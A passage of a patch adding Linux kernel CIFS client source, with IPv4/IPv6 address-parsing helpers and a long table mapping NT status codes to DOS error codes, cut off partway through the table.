++ * Convert a string containing text IPv4 or IPv6 address to binary form.
++ *
++ * Returns 0 on failure.
++ */
++static int
++cifs_inet_pton(const int address_family, const char *cp, int len, void *dst)
++{
++	int ret = 0;
++
++	/* calculate length by finding first slash or NULL */
++	if (address_family == AF_INET)
++		ret = in4_pton(cp, len, dst, '\\', NULL);
++	else if (address_family == AF_INET6)
++		ret = in6_pton(cp, len, dst , '\\', NULL);
++
++	cifs_dbg(NOISY, "address conversion returned %d for %*.*s\n",
++		 ret, len, len, cp);
++	if (ret > 0)
++		ret = 1;
++	return ret;
++}
++
++/*
++ * Try to convert a string to an IPv4 address and then attempt to convert
++ * it to an IPv6 address if that fails. Set the family field if either
++ * succeeds. If it's an IPv6 address and it has a '%' sign in it, try to
++ * treat the part following it as a numeric sin6_scope_id.
++ *
++ * Returns 0 on failure.
++ */
++int
++cifs_convert_address(struct sockaddr *dst, const char *src, int len)
++{
++	int rc, alen, slen;
++	const char *pct;
++	char scope_id[13];
++	struct sockaddr_in *s4 = (struct sockaddr_in *) dst;
++	struct sockaddr_in6 *s6 = (struct sockaddr_in6 *) dst;
++
++	/* IPv4 address */
++	if (cifs_inet_pton(AF_INET, src, len, &s4->sin_addr.s_addr)) {
++		s4->sin_family = AF_INET;
++		return 1;
++	}
++
++	/* attempt to exclude the scope ID from the address part */
++	pct = memchr(src, '%', len);
++	alen = pct ? pct - src : len;
++
++	rc = cifs_inet_pton(AF_INET6, src, alen, &s6->sin6_addr.s6_addr);
++	if (!rc)
++		return rc;
++
++	s6->sin6_family = AF_INET6;
++	if (pct) {
++		/* grab the scope ID */
++		slen = len - (alen + 1);
++		if (slen <= 0 || slen > 12)
++			return 0;
++		memcpy(scope_id, pct + 1, slen);
++		scope_id[slen] = '\0';
++
++		rc = kstrtouint(scope_id, 0, &s6->sin6_scope_id);
++		rc = (rc == 0) ? 1 : 0;
++	}
++
++	return rc;
++}
++
++void
++cifs_set_port(struct sockaddr *addr, const unsigned short int port)
++{
++	switch (addr->sa_family) {
++	case AF_INET:
++		((struct sockaddr_in *)addr)->sin_port = htons(port);
++		break;
++	case AF_INET6:
++		((struct sockaddr_in6 *)addr)->sin6_port = htons(port);
++		break;
++	}
++}
++
++/*****************************************************************************
++convert a NT status code to a dos class/code
++ *****************************************************************************/
++/* NT status -> dos error map */
++static const struct {
++	__u8 dos_class;
++	__u16 dos_code;
++	__u32 ntstatus;
++} ntstatus_to_dos_map[] = {
++	{
++	ERRDOS, ERRgeneral, NT_STATUS_UNSUCCESSFUL}, {
++	ERRDOS, ERRbadfunc, NT_STATUS_NOT_IMPLEMENTED}, {
++	ERRDOS, ERRinvlevel, NT_STATUS_INVALID_INFO_CLASS}, {
++	ERRDOS, 24, NT_STATUS_INFO_LENGTH_MISMATCH}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ACCESS_VIOLATION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_IN_PAGE_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PAGEFILE_QUOTA}, {
++	ERRDOS, ERRbadfid, NT_STATUS_INVALID_HANDLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_INITIAL_STACK}, {
++	ERRDOS, 193, NT_STATUS_BAD_INITIAL_PC}, {
++	ERRDOS, 87, NT_STATUS_INVALID_CID}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TIMER_NOT_CANCELED}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER}, {
++	ERRDOS, ERRbadfile, NT_STATUS_NO_SUCH_DEVICE}, {
++	ERRDOS, ERRbadfile, NT_STATUS_NO_SUCH_FILE}, {
++	ERRDOS, ERRbadfunc, NT_STATUS_INVALID_DEVICE_REQUEST}, {
++	ERRDOS, 38, NT_STATUS_END_OF_FILE}, {
++	ERRDOS, 34, NT_STATUS_WRONG_VOLUME}, {
++	ERRDOS, 21, NT_STATUS_NO_MEDIA_IN_DEVICE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNRECOGNIZED_MEDIA}, {
++	ERRDOS, 27, NT_STATUS_NONEXISTENT_SECTOR},
++/*	{ This NT error code was 'sqashed'
++	 from NT_STATUS_MORE_PROCESSING_REQUIRED to NT_STATUS_OK
++	 during the session setup } */
++	{
++	ERRDOS, ERRnomem, NT_STATUS_NO_MEMORY}, {
++	ERRDOS, 487, NT_STATUS_CONFLICTING_ADDRESSES}, {
++	ERRDOS, 487, NT_STATUS_NOT_MAPPED_VIEW}, {
++	ERRDOS, 87, NT_STATUS_UNABLE_TO_FREE_VM}, {
++	ERRDOS, 87, NT_STATUS_UNABLE_TO_DELETE_SECTION}, {
++	ERRDOS, 2142, NT_STATUS_INVALID_SYSTEM_SERVICE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ILLEGAL_INSTRUCTION}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_INVALID_LOCK_SEQUENCE}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_INVALID_VIEW_SIZE}, {
++	ERRDOS, 193, NT_STATUS_INVALID_FILE_FOR_SECTION}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_ALREADY_COMMITTED},
++/*	{ This NT error code was 'sqashed'
++	 from NT_STATUS_ACCESS_DENIED to NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE
++	 during the session setup }   */
++	{
++	ERRDOS, ERRnoaccess, NT_STATUS_ACCESS_DENIED}, {
++	ERRDOS, 111, NT_STATUS_BUFFER_TOO_SMALL}, {
++	ERRDOS, ERRbadfid, NT_STATUS_OBJECT_TYPE_MISMATCH}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NONCONTINUABLE_EXCEPTION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_DISPOSITION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNWIND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_STACK}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_UNWIND_TARGET}, {
++	ERRDOS, 158, NT_STATUS_NOT_LOCKED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PARITY_ERROR}, {
++	ERRDOS, 487, NT_STATUS_UNABLE_TO_DECOMMIT_VM}, {
++	ERRDOS, 487, NT_STATUS_NOT_COMMITTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_PORT_ATTRIBUTES}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PORT_MESSAGE_TOO_LONG}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_MIX}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_QUOTA_LOWER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DISK_CORRUPT_ERROR}, {
++	 /* mapping changed since shell does lookup on * expects FileNotFound */
++	ERRDOS, ERRbadfile, NT_STATUS_OBJECT_NAME_INVALID}, {
++	ERRDOS, ERRbadfile, NT_STATUS_OBJECT_NAME_NOT_FOUND}, {
++	ERRDOS, ERRalreadyexists, NT_STATUS_OBJECT_NAME_COLLISION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_HANDLE_NOT_WAITABLE}, {
++	ERRDOS, ERRbadfid, NT_STATUS_PORT_DISCONNECTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_ALREADY_ATTACHED}, {
++	ERRDOS, 161, NT_STATUS_OBJECT_PATH_INVALID}, {
++	ERRDOS, ERRbadpath, NT_STATUS_OBJECT_PATH_NOT_FOUND}, {
++	ERRDOS, 161, NT_STATUS_OBJECT_PATH_SYNTAX_BAD}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DATA_OVERRUN}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DATA_LATE_ERROR}, {
++	ERRDOS, 23, NT_STATUS_DATA_ERROR}, {
++	ERRDOS, 23, NT_STATUS_CRC_ERROR}, {
++	ERRDOS, ERRnomem, NT_STATUS_SECTION_TOO_BIG}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_PORT_CONNECTION_REFUSED}, {
++	ERRDOS, ERRbadfid, NT_STATUS_INVALID_PORT_HANDLE}, {
++	ERRDOS, ERRbadshare, NT_STATUS_SHARING_VIOLATION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_QUOTA_EXCEEDED}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PAGE_PROTECTION}, {
++	ERRDOS, 288, NT_STATUS_MUTANT_NOT_OWNED}, {
++	ERRDOS, 298, NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED}, {
++	ERRDOS, 87, NT_STATUS_PORT_ALREADY_SET}, {
++	ERRDOS, 87, NT_STATUS_SECTION_NOT_IMAGE}, {
++	ERRDOS, 156, NT_STATUS_SUSPEND_COUNT_EXCEEDED}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_THREAD_IS_TERMINATING}, {
++	ERRDOS, 87, NT_STATUS_BAD_WORKING_SET_LIMIT}, {
++	ERRDOS, 87, NT_STATUS_INCOMPATIBLE_FILE_MAP}, {
++	ERRDOS, 87, NT_STATUS_SECTION_PROTECTION}, {
++	ERRDOS, ERReasnotsupported, NT_STATUS_EAS_NOT_SUPPORTED}, {
++	ERRDOS, 255, NT_STATUS_EA_TOO_LARGE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NONEXISTENT_EA_ENTRY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_EAS_ON_FILE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_EA_CORRUPT_ERROR}, {
++	ERRDOS, ERRlock, NT_STATUS_FILE_LOCK_CONFLICT}, {
++	ERRDOS, ERRlock, NT_STATUS_LOCK_NOT_GRANTED}, {
++	ERRDOS, ERRbadfile, NT_STATUS_DELETE_PENDING}, {
++	ERRDOS, ERRunsup, NT_STATUS_CTL_FILE_NOT_SUPPORTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNKNOWN_REVISION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REVISION_MISMATCH}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_OWNER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_PRIMARY_GROUP}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_IMPERSONATION_TOKEN}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANT_DISABLE_MANDATORY}, {
++	ERRDOS, 2215, NT_STATUS_NO_LOGON_SERVERS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_LOGON_SESSION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_PRIVILEGE}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_PRIVILEGE_NOT_HELD}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ACCOUNT_NAME}, {
++	ERRHRD, ERRgeneral, NT_STATUS_USER_EXISTS},
++/*	{ This NT error code was 'sqashed'
++	 from NT_STATUS_NO_SUCH_USER to NT_STATUS_LOGON_FAILURE
++	 during the session setup } */
++	{
++	ERRDOS, ERRnoaccess, NT_STATUS_NO_SUCH_USER}, { /* could map to 2238 */
++	ERRHRD, ERRgeneral, NT_STATUS_GROUP_EXISTS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_GROUP}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_IN_GROUP}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_NOT_IN_GROUP}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LAST_ADMIN},
++/*	{ This NT error code was 'sqashed'
++	 from NT_STATUS_WRONG_PASSWORD to NT_STATUS_LOGON_FAILURE
++	 during the session setup } */
++	{
++	ERRSRV, ERRbadpw, NT_STATUS_WRONG_PASSWORD}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ILL_FORMED_PASSWORD}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PASSWORD_RESTRICTION}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_LOGON_FAILURE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ACCOUNT_RESTRICTION}, {
++	ERRSRV, ERRbadLogonTime, NT_STATUS_INVALID_LOGON_HOURS}, {
++	ERRSRV, ERRbadclient, NT_STATUS_INVALID_WORKSTATION}, {
++	ERRSRV, ERRpasswordExpired, NT_STATUS_PASSWORD_EXPIRED}, {
++	ERRSRV, ERRaccountexpired, NT_STATUS_ACCOUNT_DISABLED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NONE_MAPPED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_LUIDS_REQUESTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LUIDS_EXHAUSTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SUB_AUTHORITY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ACL}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SID}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SECURITY_DESCR}, {
++	ERRDOS, 127, NT_STATUS_PROCEDURE_NOT_FOUND}, {
++	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_FORMAT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_TOKEN}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_INHERITANCE_ACL}, {
++	ERRDOS, 158, NT_STATUS_RANGE_NOT_LOCKED}, {
++	ERRDOS, 112, NT_STATUS_DISK_FULL}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SERVER_DISABLED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SERVER_NOT_DISABLED}, {
++	ERRDOS, 68, NT_STATUS_TOO_MANY_GUIDS_REQUESTED}, {
++	ERRDOS, 259, NT_STATUS_GUIDS_EXHAUSTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ID_AUTHORITY}, {
++	ERRDOS, 259, NT_STATUS_AGENTS_EXHAUSTED}, {
++	ERRDOS, 154, NT_STATUS_INVALID_VOLUME_LABEL}, {
++	ERRDOS, 14, NT_STATUS_SECTION_NOT_EXTENDED}, {
++	ERRDOS, 487, NT_STATUS_NOT_MAPPED_DATA}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_DATA_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_TYPE_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_NAME_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ARRAY_BOUNDS_EXCEEDED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_DENORMAL_OPERAND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_DIVIDE_BY_ZERO}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_INEXACT_RESULT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_INVALID_OPERATION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_OVERFLOW}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_STACK_CHECK}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_UNDERFLOW}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INTEGER_DIVIDE_BY_ZERO}, {
++	ERRDOS, 534, NT_STATUS_INTEGER_OVERFLOW}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PRIVILEGED_INSTRUCTION}, {
++	ERRDOS, ERRnomem, NT_STATUS_TOO_MANY_PAGING_FILES}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FILE_INVALID}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ALLOTTED_SPACE_EXCEEDED},
++/*	{ This NT error code was 'sqashed'
++	 from NT_STATUS_INSUFFICIENT_RESOURCES to
++	 NT_STATUS_INSUFF_SERVER_RESOURCES during the session setup } */
++	{
++	ERRDOS, ERRnoresource, NT_STATUS_INSUFFICIENT_RESOURCES}, {
++	ERRDOS, ERRbadpath, NT_STATUS_DFS_EXIT_PATH_FOUND}, {
++	ERRDOS, 23, NT_STATUS_DEVICE_DATA_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_NOT_CONNECTED}, {
++	ERRDOS, 21, NT_STATUS_DEVICE_POWER_FAILURE}, {
++	ERRDOS, 487, NT_STATUS_FREE_VM_NOT_AT_BASE}, {
++	ERRDOS, 487, NT_STATUS_MEMORY_NOT_ALLOCATED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_WORKING_SET_QUOTA}, {
++	ERRDOS, 19, NT_STATUS_MEDIA_WRITE_PROTECTED}, {
++	ERRDOS, 21, NT_STATUS_DEVICE_NOT_READY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_GROUP_ATTRIBUTES}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_IMPERSONATION_LEVEL}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANT_OPEN_ANONYMOUS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_VALIDATION_CLASS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_TOKEN_TYPE}, {
++	ERRDOS, 87, NT_STATUS_BAD_MASTER_BOOT_RECORD}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INSTRUCTION_MISALIGNMENT}, {
++	ERRDOS, ERRpipebusy, NT_STATUS_INSTANCE_NOT_AVAILABLE}, {
++	ERRDOS, ERRpipebusy, NT_STATUS_PIPE_NOT_AVAILABLE}, {
++	ERRDOS, ERRbadpipe, NT_STATUS_INVALID_PIPE_STATE}, {
++	ERRDOS, ERRpipebusy, NT_STATUS_PIPE_BUSY}, {
++	ERRDOS, ERRbadfunc, NT_STATUS_ILLEGAL_FUNCTION}, {
++	ERRDOS, ERRnotconnected, NT_STATUS_PIPE_DISCONNECTED}, {
++	ERRDOS, ERRpipeclosing, NT_STATUS_PIPE_CLOSING}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PIPE_CONNECTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PIPE_LISTENING}, {
++	ERRDOS, ERRbadpipe, NT_STATUS_INVALID_READ_MODE}, {
++	ERRDOS, 121, NT_STATUS_IO_TIMEOUT}, {
++	ERRDOS, 38, NT_STATUS_FILE_FORCED_CLOSED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PROFILING_NOT_STARTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PROFILING_NOT_STOPPED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_COULD_NOT_INTERPRET}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_FILE_IS_A_DIRECTORY}, {
++	ERRDOS, ERRunsup, NT_STATUS_NOT_SUPPORTED}, {
++	ERRDOS, 51, NT_STATUS_REMOTE_NOT_LISTENING}, {
++	ERRDOS, 52, NT_STATUS_DUPLICATE_NAME}, {
++	ERRDOS, 53, NT_STATUS_BAD_NETWORK_PATH}, {
++	ERRDOS, 54, NT_STATUS_NETWORK_BUSY}, {
++	ERRDOS, 55, NT_STATUS_DEVICE_DOES_NOT_EXIST}, {
++	ERRDOS, 56, NT_STATUS_TOO_MANY_COMMANDS}, {
++	ERRDOS, 57, NT_STATUS_ADAPTER_HARDWARE_ERROR}, {
++	ERRDOS, 58, NT_STATUS_INVALID_NETWORK_RESPONSE}, {
++	ERRDOS, 59, NT_STATUS_UNEXPECTED_NETWORK_ERROR}, {
++	ERRDOS, 60, NT_STATUS_BAD_REMOTE_ADAPTER}, {
++	ERRDOS, 61, NT_STATUS_PRINT_QUEUE_FULL}, {
++	ERRDOS, 62, NT_STATUS_NO_SPOOL_SPACE}, {
++	ERRDOS, 63, NT_STATUS_PRINT_CANCELLED}, {
++	ERRDOS, 64, NT_STATUS_NETWORK_NAME_DELETED}, {
++	ERRDOS, 65, NT_STATUS_NETWORK_ACCESS_DENIED}, {
++	ERRDOS, 66, NT_STATUS_BAD_DEVICE_TYPE}, {
++	ERRDOS, ERRnosuchshare, NT_STATUS_BAD_NETWORK_NAME}, {
++	ERRDOS, 68, NT_STATUS_TOO_MANY_NAMES}, {
++	ERRDOS, 69, NT_STATUS_TOO_MANY_SESSIONS}, {
++	ERRDOS, 70, NT_STATUS_SHARING_PAUSED}, {
++	ERRDOS, 71, NT_STATUS_REQUEST_NOT_ACCEPTED}, {
++	ERRDOS, 72, NT_STATUS_REDIRECTOR_PAUSED}, {
++	ERRDOS, 88, NT_STATUS_NET_WRITE_FAULT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PROFILING_AT_LIMIT}, {
++	ERRDOS, ERRdiffdevice, NT_STATUS_NOT_SAME_DEVICE}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_FILE_RENAMED}, {
++	ERRDOS, 240, NT_STATUS_VIRTUAL_CIRCUIT_CLOSED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SECURITY_ON_OBJECT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANT_WAIT}, {
++	ERRDOS, ERRpipeclosing, NT_STATUS_PIPE_EMPTY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANT_ACCESS_DOMAIN_INFO}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANT_TERMINATE_SELF}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SERVER_STATE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_DOMAIN_STATE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_DOMAIN_ROLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_DOMAIN}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_EXISTS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_LIMIT_EXCEEDED}, {
++	ERRDOS, 300, NT_STATUS_OPLOCK_NOT_GRANTED}, {
++	ERRDOS, 301, NT_STATUS_INVALID_OPLOCK_PROTOCOL}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INTERNAL_DB_CORRUPTION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INTERNAL_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_GENERIC_NOT_MAPPED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_DESCRIPTOR_FORMAT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_USER_BUFFER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_IO_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_MM_CREATE_ERR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_MM_MAP_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_MM_EXTEND_ERR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NOT_LOGON_PROCESS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOGON_SESSION_EXISTS}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_1}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_2}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_3}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_4}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_5}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_6}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_7}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_8}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_9}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_10}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_11}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_12}, {
++	ERRDOS, ERRbadpath, NT_STATUS_REDIRECTOR_NOT_STARTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REDIRECTOR_STARTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_STACK_OVERFLOW}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_PACKAGE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_FUNCTION_TABLE}, {
++	ERRDOS, 203, 0xc0000100}, {
++	ERRDOS, 145, NT_STATUS_DIRECTORY_NOT_EMPTY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FILE_CORRUPT_ERROR}, {
++	ERRDOS, 267, NT_STATUS_NOT_A_DIRECTORY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_LOGON_SESSION_STATE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOGON_SESSION_COLLISION}, {
++	ERRDOS, 206, NT_STATUS_NAME_TOO_LONG}, {
++	ERRDOS, 2401, NT_STATUS_FILES_OPEN}, {
++	ERRDOS, 2404, NT_STATUS_CONNECTION_IN_USE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MESSAGE_NOT_FOUND}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_PROCESS_IS_TERMINATING}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LOGON_TYPE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_GUID_TRANSLATION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANNOT_IMPERSONATE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_IMAGE_ALREADY_LOADED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_NOT_PRESENT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_LID_NOT_EXIST}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_LID_ALREADY_OWNED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_NOT_LID_OWNER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_INVALID_COMMAND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_INVALID_LID}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_INVALID_SELECTOR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_LDT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LDT_SIZE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LDT_OFFSET}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LDT_DESCRIPTOR}, {
++	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_NE_FORMAT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RXACT_INVALID_STATE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RXACT_COMMIT_FAILURE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MAPPED_FILE_SIZE_ZERO}, {
++	ERRDOS, ERRnofids, NT_STATUS_TOO_MANY_OPENED_FILES}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANCELLED}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_CANNOT_DELETE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_COMPUTER_NAME}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_FILE_DELETED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SPECIAL_ACCOUNT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SPECIAL_GROUP}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SPECIAL_USER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MEMBERS_PRIMARY_GROUP}, {
++	ERRDOS, ERRbadfid, NT_STATUS_FILE_CLOSED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_THREADS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_THREAD_NOT_IN_PROCESS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TOKEN_ALREADY_IN_USE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PAGEFILE_QUOTA_EXCEEDED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_COMMITMENT_LIMIT}, {
++	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_LE_FORMAT}, {
++	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_NOT_MZ}, {
++	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_PROTECT}, {
++	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_WIN_16}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOGON_SERVER_CONFLICT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TIME_DIFFERENCE_AT_DC}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SYNCHRONIZATION_REQUIRED}, {
++	ERRDOS, 126, NT_STATUS_DLL_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_OPEN_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_IO_PRIVILEGE_FAILED}, {
++	ERRDOS, 182, NT_STATUS_ORDINAL_NOT_FOUND}, {
++	ERRDOS, 127, NT_STATUS_ENTRYPOINT_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CONTROL_C_EXIT}, {
++	ERRDOS, 64, NT_STATUS_LOCAL_DISCONNECT}, {
++	ERRDOS, 64, NT_STATUS_REMOTE_DISCONNECT}, {
++	ERRDOS, 51, NT_STATUS_REMOTE_RESOURCES}, {
++	ERRDOS, 59, NT_STATUS_LINK_FAILED}, {
++	ERRDOS, 59, NT_STATUS_LINK_TIMEOUT}, {
++	ERRDOS, 59, NT_STATUS_INVALID_CONNECTION}, {
++	ERRDOS, 59, NT_STATUS_INVALID_ADDRESS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DLL_INIT_FAILED}, {
